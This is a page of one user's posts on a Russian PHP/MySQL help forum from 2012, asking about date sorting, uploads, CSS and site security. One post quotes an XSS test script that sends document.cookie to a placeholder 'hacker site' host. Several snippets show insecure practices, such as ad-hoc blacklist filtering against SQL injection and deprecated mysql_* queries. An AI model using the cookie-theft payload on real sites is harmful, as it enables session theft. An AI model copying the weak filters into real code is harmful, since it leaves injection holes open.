PHP.SU

Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи

Страниц (8): « 1 2 3 [4] 5 6 7 8 »

> Найдено сообщений: 112
andre Отправлено: 29 Декабря, 2012 - 11:18:03 • Тема: реклама при выводе из базы • Форум: SQL и Архитектура БД

Ответов: 6
Просмотров: 54
вот часть кода SQL
CODE (SQL):
скопировать код в буфер обмена
  1. $gst = mysql_query("SELECT * , DATE_FORMAT(`data`,'%d.%m.%Y') AS `data` FROM `tema` WHERE text!=''  ORDER BY DATE_FORMAT(`data`,'%Y.%m.%d') DESC LIMIT $first, $max");
  2. while($file = mysql_fetch_array($gst))
  3.  

далее идет print и вывод всех строк из таблицы. Вопрос такой.На странице у меня выводится по 12 статей.хотелось бы сделать так,что бы после вывода 4й статьи выводилась реклама а после рекламы вывод из БД продолжался бы. как это можно реализовать?
andre Отправлено: 27 Декабря, 2012 - 08:59:19 • Тема: Вывод данных из БД по времени в порядке убывания • Форум: Напишите за меня, пожалуйста

Ответов: 6
Просмотров: 74
Спасибо Хорошо
andre Отправлено: 27 Декабря, 2012 - 08:43:01 • Тема: Вывод данных из БД по времени в порядке убывания • Форум: Напишите за меня, пожалуйста

Ответов: 6
Просмотров: 74
Здравствуйте,

CODE (SQL):
скопировать код в буфер обмена
  1.  
  2. $gst = mysql_query("SELECT * , DATE_FORMAT(`data`,'%d.%m.%Y') AS `data` FROM `tema` WHERE text!=' '  ORDER BY 'data' DESC LIMIT 5");
  3.  


в поле data имеются значения дня-месяца-года , мне нужно вывести информацию из столбца tema по дате в порядке убывания.
тот код что написан выводит в порядке убывания судя по всему только по числу,не учитывая месяц и год.
andre Отправлено: 26 Декабря, 2012 - 16:11:28 • Тема: Проблема с сортировкой по времения • Форум: SQL и Архитектура БД

Ответов: 1
Просмотров: 24
имеется такой запрос а вывод из бд
CODE (SQL):
скопировать код в буфер обмена
  1.  
  2. $gst = mysql_query("SELECT * , DATE_FORMAT(`data`,'%d.%m.%Y') AS `data` FROM `tema` WHERE text!=''  ORDER BY 'data' DESC LIMIT $first, $max");
  3.  

в поле data (date) имеются значения дня-месяца-года , мне как раз нужно вывести по даье в порядке убывания. а мне выводит ,при вушенаписанном запросе только в порядке убывания даты,а месяц и год она вообще не читает.пожалуйста,исправте запрос,что бы выводилось по день-месяц-год в порядке убывания
andre Отправлено: 22 Декабря, 2012 - 18:39:53 • Тема: проблема загрузки фото на сервер • Форум: Напишите за меня, пожалуйста

Ответов: 2
Просмотров: 37
PHP:
скопировать код в буфер обмена
  1.  
  2.  if($_POST['editstt']!="")
  3. {
  4. mysql_query("UPDATE  БЛА БЛА БЛА);
  5. if($_FILES['userimage']['tmp_name']!=""){
  6. $uploadfile = 'image/'.$_GET['editst'].".jpg";
  7. if (copy($_FILES['userimage']['tmp_name'], $uploadfile))
  8. {
  9. echo "<h3>Файл успешно загружен на сервер</h3>";
  10. }
  11. else { echo "<h3>Ошибка! Не удалось загрузить файл на сервер!</h3>"; exit; }
  12. }
  13. }
  14.  

На денвере все работает.но появилась проблема с загрузкой фотографий на реальный сервер,пока в бесплатном хостинге. выбираю фотографию,и нажимаю изменить.все это делаю через админку.открываю FileZilla (ftp) и вижу фотография загрузилась.захожу на индекс,но фотографии нету.открываю FileZilla, скачиваю фотографию,что загрузил,но она не открывается.хотя написано,что формат jpg. А когда я фотографию не через админку,а на прямую через FileZilla кидаю на сервер- все работает. в чем может быть причина?
andre Отправлено: 22 Декабря, 2012 - 10:47:53 • Тема: медленная загрузка сайта • Форум: Напишите за меня, пожалуйста

Ответов: 2
Просмотров: 58
вы скорее всего правы,я начал подчищать мусор ,стало быстрее грузиться
andre Отправлено: 22 Декабря, 2012 - 10:22:45 • Тема: медленная загрузка сайта • Форум: Напишите за меня, пожалуйста

Ответов: 2
Просмотров: 58
выложил пробный сайт
http://www[dot]fst05[dot]h16[dot]ru/index.php
сайт был выложен на бесплатный хостинг в качестве эксперемента.вопрос- почему страницы сайта так медленно грузятся,хотя интернет у меня не медленный.сайт написан на php и mysql. больших запросов нет. как показыват опера на странице Элементы 22Б.
но с телефона этот сайт грузится быстро.с апада тоже быстро.но если зайти с компьютера,то страница открывается секунд 15-20. в чем может быть проблема?
andre Отправлено: 21 Декабря, 2012 - 20:23:13 • Тема: защита от sql иньекций • Форум: SQL и Архитектура БД

Ответов: 10
Просмотров: 73
у меня как раз при header выводится Cannot modify header information...

еще такой вопрос,а как обезопасить такой вид адресной строки
localhost/news2/index.php
или же тут ничего не нужно защищать ? Улыбка
andre Отправлено: 21 Декабря, 2012 - 18:58:03 • Тема: защита от sql иньекций • Форум: SQL и Архитектура БД

Ответов: 10
Просмотров: 73
у меня на header ругается,по этому я сделал через script Улыбка
andre Отправлено: 21 Декабря, 2012 - 13:51:49 • Тема: защита от sql иньекций • Форум: SQL и Архитектура БД

Ответов: 10
Просмотров: 73
вот еще адресная старока

PHP:
скопировать код в буфер обмена
  1.  
  2. if(preg_match("/[%a-z_@.,^=:;а-я\"*()&$#№+\-!?<>\~`|[{}\]]/i", $_GET['jjj']))
  3. {echo'<script>location.replace("index.php");</script>  ';}
  4.  

этого тоже с головой хватит? Улыбка
andre Отправлено: 21 Декабря, 2012 - 13:40:39 • Тема: защита от sql иньекций • Форум: SQL и Архитектура БД

Ответов: 10
Просмотров: 73
Здравствуйте,говорят,что драйвер pdo очень хорошо защищает от скэль иньекций.но в одиночку мне с ним сложно разобраться.по этому я решил действовать стареньким методом. и хотел бы у вас спросить ,является ли защита высокой ,которую реализовал я


CODE (SQL):
скопировать код в буфер обмена
  1.  
  2. $name2=trim($_POST['text']);
  3. $filter22 = array("<", ">","="," (",")",";","/","'","`");
  4. $name2=str_replace ($filter22, "", $name2);
  5. $name2=mysql_real_escape_string($name2);
  6.  
andre Отправлено: 20 Декабря, 2012 - 21:16:52 • Тема: отмена переноса строки после вывода даты • Форум: HTML, Дизайн & CSS

Ответов: 1
Просмотров: 1121
вот css
CODE (html):
скопировать код в буфер обмена
  1. palka{position:inherit;font-weight:50px;font-size: 15px;text-align: justify;}
  2. .ihhh { font-size: 14px;text-decoration: none;color:#0a2b93;  }
  3.  a:hover .ihhh{text-decoration: underline;color:#0a2b93;}
.

а вот сам вывод кода.

PHP:
скопировать код в буфер обмена
  1.  
  2. print"<table><tr><td valign=\"top\" width=290 >{$film22vvvv['data']}<font class=\"palka\"  face=\"Courier New\" color=\"919191\">|</font><a href=\"stat.php?jjj={$film22vvvv['iidd']}\"><h2 class=\"ihhh\">{$razdelzagolovokkk}</h2></a></td></tr></table>";
  3.  


проблема в том,что после даты идет перенос строки,котрого не должно быть.как мне отменить этот перенос?
andre Отправлено: 20 Декабря, 2012 - 21:02:46 • Тема: HTML переход • Форум: HTML, Дизайн & CSS

Ответов: 4
Просмотров: 917
где это вверху?и что за информация?
andre Отправлено: 19 Декабря, 2012 - 19:00:01 • Тема: не могу понять куда ставить htmlspecialchars • Форум: Напишите за меня, пожалуйста

Ответов: 3
Просмотров: 57
в смысле?)
andre Отправлено: 19 Декабря, 2012 - 18:44:36 • Тема: не могу понять куда ставить htmlspecialchars • Форум: Напишите за меня, пожалуйста

Ответов: 3
Просмотров: 57
решил обезопасить сайт от xss. вот как я это сделал.
PHP:
скопировать код в буфер обмена
  1.  
  2. $safe=htmlspecialchars($kom['text']);
  3. print <table><tr><td>{$safe}</td></tr></table>;
  4.  

этот код стоит на выводе текста. я решил проверить,действительно ли работает и вставил вот этот скрипт
CODE (javascript):
скопировать код в буфер обмена
  1.  
  2. <script type="text/javascript">
  3. location.href="www.сайт_хакера.ru/a.php?c="+document.cookie;
  4. </script>
  5.  

как написано на одном сайте,этот скрипт после обработки htmlspecialchars должен выводиться так :
&lt;script type=&quot;text/javascript&quot;&gt;
location.href=&quot;www.сайт_хакера.ru/a.php?c=&quot;+document.cookie;
&lt;/script&gt;

а у меня скрипт выводится в первоночальном виде из БД. или же этот htmlspecialchars должен ставится не на выводе,а на вводе в бд.

Страниц (8): « 1 2 3 [4] 5 6 7 8 »
Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB